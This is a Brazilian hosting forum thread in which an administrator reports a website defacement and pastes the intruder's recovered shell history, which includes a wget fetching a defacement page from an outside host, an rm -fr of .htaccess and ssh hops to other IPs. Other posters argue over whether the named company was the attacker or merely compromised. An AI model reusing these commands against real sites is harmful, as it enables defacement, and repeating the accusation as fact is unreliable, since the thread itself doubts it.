Olá Galera,

Recebi um aviso do DC, e resolvi averiguar o que realmente aconteceu.

AVISO:

Denúncia de Phishing:

|2012-01-11 02:25:11 CET |890503 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:13 CET |890530 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:14 CET |890532 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:14 CET |890533 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:14 CET |890541 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:14 CET |890546 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:16 CET |890572 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:16 CET |890575 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:17 CET |890613 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

|2012-01-11 02:25:17 CET |890658 |defaced_site |177.xx.xxx.xx | xxx.com.br |http://xxx.com.br/sys_cpanel/king.htm

xxx para preservar os domínios de nossos clientes.

A partir daí fui verificar no servidor, o cara deixou os rastros.

129 cd /home

130 ls

131 ls -la /etc/valiases/vps-no-brasil.info

132 cd vpsnobra/www

133 wget http://maxbit.com.br...ens/vb/king.htm

134 ls

135 ls -la

136 rm -fr .htaccess

137 mv king.htm index.htm

138 ssh 69.167.150.50

139 ssh 72.44.95.31

140 ssh 67.225.162.21

141 exit

Como vocês podem ver, o domínio www.vps-no-brasil.info ainda está com o conteudo, para que vocês pudessem ver.

Vale ressaltar que MaxBit.com.br já foi nosso cliente. E vale ressaltar também que já tentou atacar servidores de outros amigos.

Quem me ajudou a resolver isso, foi o Jordan, valeu Jordano.

Segue anexo com um print.

=========================

A pedido da moderação, resolvi retirar o contato. Se alguem precisar só enviar MP.

Deixa ver se eu entendi.

Esse http://maxbit.com.br atacou o servidor na cara dura assim e publicamente deixou seu rastro? Alguém fez algo a respeito?

Rocha, ele tentou (ou pode ter até conseguido) acesso à outros IPs (conforme consta no final do log) através de seu servidor.

Seria interessante verificar se são IPs conhecidos que possam comprometer a empresa.

Não estou dizendo que seja, mas pode ocorrer da MaxBit não saber da existência desse arquivo no diretório deles. Sendo assim poderiam baixar o arquivo de lá mesmo. ;-)

Deixa ver se eu entendi.

Esse http://maxbit.com.br atacou o servidor na cara dura assim e publicamente deixou seu rastro? Alguém fez algo a respeito?

Deixou o rastro sim. Eu não sei por onde ele entrou. O importante foi que deixou as pegadas.

Ainda bem que só foi uma tentativa, :)

Na verdade o maxbit.com.br pode não ter atacado o servidor, e sim, ter sito atacado e após isto utilizado para atacar o servidor do Rocha.

Também, acho isso.

Recomendo a todos que postaram que editem o que escreveram, pois do inicio ao fim escreveram um monte de nada , coisas que tem nada haver, fica até mal um cliente ver um post desse e ver que estão entregando o site deles a pessoas que tem muito pouca noção do que ocorre no proprio servidor. É só um conselho, não levem a mal, mas se quiserem deixar podem, sem brigas.

Recomendo a todos que postaram que editem o que escreveram, pois do inicio ao fim escreveram um monte de nada , coisas que tem nada haver, fica até mal um cliente ver um post desse e ver que estão entregando o site deles a pessoas que tem muito pouca noção do que ocorre no proprio servidor. É só um conselho, não levem a mal, mas se quiserem deixar podem, sem brigas.

Lol, acho que você é o que escreveu mais coisa sem noção de todos :)..

Desculpe, mais aqui é um fórum onde todos são amigos, e estão uns para ajudar os outros.

Que vejam os clientes. Isso não importa.

Recomendo a todos que postaram que editem o que escreveram, pois do inicio ao fim escreveram um monte de nada , coisas que tem nada haver, fica até mal um cliente ver um post desse e ver que estão entregando o site deles a pessoas que tem muito pouca noção do que ocorre no proprio servidor. É só um conselho, não levem a mal, mas se quiserem deixar podem, sem brigas.